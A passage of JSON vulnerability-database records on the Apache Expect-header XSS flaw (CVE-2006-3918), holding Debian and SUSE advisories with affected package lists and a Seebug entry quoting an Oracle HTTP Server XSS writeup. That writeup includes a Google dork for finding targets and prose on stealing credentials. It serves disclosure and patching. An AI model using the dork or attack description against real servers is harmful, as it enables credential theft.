"alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_i386.deb", "packageName": "apache-common", "arch": "i686", "operator": "lt"}], "edition": 1, "description": "Several remote vulnerabilities have been discovered in the Apache, the worlds most popular webserver, which may lead to the execution of arbitrary web script. The Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2005-3352](<https://security-tracker.debian.org/tracker/CVE-2005-3352>)\n\nA cross-site scripting (XSS) flaw exists in the mod_imap component of the Apache server.\n\n * [CVE-2006-3918](<https://security-tracker.debian.org/tracker/CVE-2006-3918>)\n\nApache does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks.\n\nFor the stable distribution (sarge) these problems have been fixed in version 1.3.33-6sarge3.\n\nFor the unstable distribution (sid) these problems have been fixed in version 1.3.34-3.\n\nWe recommend that you upgrade your apache package.", "reporter": "Debian", "published": "2006-09-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "apache -- missing input sanitising ", "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918", "CVE-2005-3352"], "modified": "2006-09-04T00:00:00", "href": "http://www.debian.org/security/dsa-1167", "id": "DSA-1167", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T14:50:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "title": "Oracle HTTP Server - XSS Header Injection", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3918", "CVE-2007-0275"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71772", "id": "SSV:71772", "sourceData": "\n ---------------------------------------------------------------------------------------------------------\r\n Oracle HTTP Server XSS Header Injection \r\n---------------------------------------------------------------------------------------------------------\r\n# Attack Pattern ID : CAPEC-86\r\n# CWE ID : CI-79\r\n# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)\r\n# CVE ID : not yet\r\n# Related CVEs : CVE-2006-3918, CVE-2007-0275\r\n# A.K.A : Unfiltered Header Injection\r\n# Product Type : Application\r\n# Vendor : Oracle Corporation\r\n# Product : Oracle HTTP Server for Oracle Application Server 10g\r\n# Vulnerable Versions: 10.1.2.0.2 \r\n# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0\r\n# Severity : Medium\r\n# Tested on\t : Linux, Windows Server 2003\r\n# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html\r\n# Date : 12/06/2011\r\n# Google Dork : allintitle:&#34;Oracle HTTP Server -&#34;\r\n-------------------------------------------------------------------------------------------------------\r\n[-] Credit : Yasser ABOUKIR\r\n[-] Site : http://www.yaboukir.com \r\n[-] Email : yaboukir@gmail.com\r\n[-] Occupation: ITC security engineering student at ENSIAS - Morocco\r\n-------------------------------------------------------------------------------------------------------\r\n[+] Vulnerability description:\r\n\tThe Oracle HTTP Server does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file. \r\n\r\n[+] Vulnerability origin: \r\n\tOracle HTTP Server (OHS) developed by Oracle Corporation is an OracleAS 10g&#39;s Web Server component. The vulnerable product is based on the Apache 1.3 Web server. This later is vulnerable to Unfiltered Header Injection which makes the vulnerability?s origin of this OHS version.\r\n\r\n[+] PoC: \r\n See the video in Youtube: http://www.youtube.com/watch?v=cBmbkAYXdjo\r\n See the PDF: http://www.yaboukir.com/wp-content/bugtraq/XSS_Header_Injection_in_OHS_by_Yasser.pdf\r\n\r\n[+] Attack:\r\n \t&#62; Atack Prerequisites for a successful exploitation:\r\n\t\tTarget software must be a client that allows scripting communication from remote hosts. Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victims by enticing them to visit remote site of some sort to redirect them and data to. \r\n\t&#62; Attacker Skills or Knowledge Required\r\n \t\t- Skill or Knowledge Level: Low\r\n\t\t\tTo achieve a redirection and use of less trusted source, an attacker can simply edit HTTP Headers that are sent to client machine.\r\n \t\t- Skill or Knowledge Level: High\r\n\t\t\tExploiting a client side vulnerability to inject malicious scripts into the browser&#39;s executable process.\r\n\t&#62; Methods of Attack\r\n\t\t- Injection\r\n\t\t- Modification of Resources\r\n\t\t- Protocol Manipulation\r\n\t&#62; Exploit:\r\n\t\t- Steal session IDs, credentials, page content, etc.: \r\n As the attacker succeeds in exploiting the vulnerability, he can choose to steal user&#39;s credentials in order to reuse or to analyze them later on.\r\n\t\t- Forceful browsing: \r\nWhen the attacker targets this Oracle application (through CSRF vulnerabilities, Clickjacking), the user will then be the one who perform the attacks without being aware of it. \r\n\t\t- Content spoofing:\r\nBy manipulating the content, the attacker targets the information that the user would like to get from the Website.\r\n\r\n[+] Solution:\r\nA solution to this issue might be the update/upgrade to the Oracle HTTP Server 11g which is based on Apache 2.2. In fact, Oracle supports only the code they ship with the Oracle Application Server 10g. Externally added modules or other changes are not supported. As a matter of fact, security patches from the Apache organization in its latest versions 1.3.35/2.0.58/2.2.2 to this vulnerability onto Oracle HTTP Server should not be applied. \r\n\r\n[+] References:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918\r\nOracle Application Server 10g Release 3 (10.1.3.1.0) Overview of Oracle HTTP Server, An Oracle White Paper, October 2006\r\n http://seclists.org/Webappsec/2006/q2/245\r\n http://www.securiteam.com/securityreviews/5KP0M1FJ5E.html\r\n http://www.securityfocus.com/archive/1/441014\r\n http://kb2.adobe.com/cps/403/kb403030.html\r\n http://www.oracle.com/technetwork/middleware/ias/index-091236.html\r\n http://www.oracle.com/technetwork/middleware/ias/faq-089946.html\r\n http://download.oracle.com/otndocs/tech/ias/portal/files/RG/complete_Web_site_ohs_faq.htm#OHS\r\n http://xss.cx/http-header-injection-expect-response-splitting-cI-113-example-poc.aspx\r\nhttp://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-707/opxss-1/Oracle-Application-Server.html\r\n\r\nPDF Mirror: http://www.exploit-db.com/sploits/XSS_Header_Injection_in_OHS_by_Yasser.pdf\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71772", "status": "poc"}], "suse": [{"lastseen": "2016-09-04T12:36:33", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.0.54-10.8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.0.54-10.8.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2", "packageFilename": "apache2-2.0.54-10.8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "2.0.53-9.15", "packageName": "apache2", "packageFilename": "apache2-2.0.53-9.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "2.0.50-7.17", "packageName": "apache2", "packageFilename": "apache2-2.0.50-7.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "2.0.53-9.15", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.0.53-9.15.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2", "packageFilename": "apache2-2.0.54-10.8.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "2.0.50-7.17", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.0.50-7.17.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "2.0.50-7.17", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.0.50-7.17.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.0.54-10.8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.0.54-10.8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "2.0.53-9.15", "packageName": "apache2", "packageFilename": "apache2-2.0.53-9.15.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "2.0.53-9.15", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.0.53-9.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "2.0.53-9.15", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.0.53-9.15.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.0.54-10.8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "2.0.50-7.17", "packageName": "apache2", "packageFilename": "apache2-2.0.50-7.17.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2", "packageFilename": "apache2-2.0.54-10.8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "2.0.50-7.17", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.0.50-7.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "2.0.54-10.8", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.0.54-10.8.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "2.0.53-9.15", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.0.53-9.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "2.0.50-7.17", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.0.50-7.17.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "The web server Apache2 has been updated to fix several security issues:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2006-09-08T14:34:17", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "cryptographic problems in apache2", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2700", "CVE-2006-3918", "CVE-2005-3357"], "modified": "2006-09-08T14:34:17", "id": "SUSE-SA:2006:051", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-09/msg00016.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:44", "references": [], "affectedPackage": [{"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.4-70.4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-24.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.4-70.4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2", "packageFilename": "apache2-2.2.3-24.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-24.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-utils", "packageFilename": "apache2-utils-2.2.4-70.4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.4-70.4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-24.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-24.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2", "packageFilename": "apache2-2.2.4-70.4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-24.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.4-70.4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-24.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-24.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2", "packageFilename": "apache2-2.2.4-70.4.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.4-70.4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2", "packageFilename": "apache2-2.2.3-24.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.4-70.4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-24.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-utils", "packageFilename": "apache2-utils-2.2.4-70.4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.4-70.4.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2", "packageFilename": "apache2-2.2.4-70.4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.4-70.4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.4-70.4.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.4-70.4.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-24.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.4-70.4.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-24.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-24.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-24.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-24.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-16.17.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.4-70.4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-24.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": 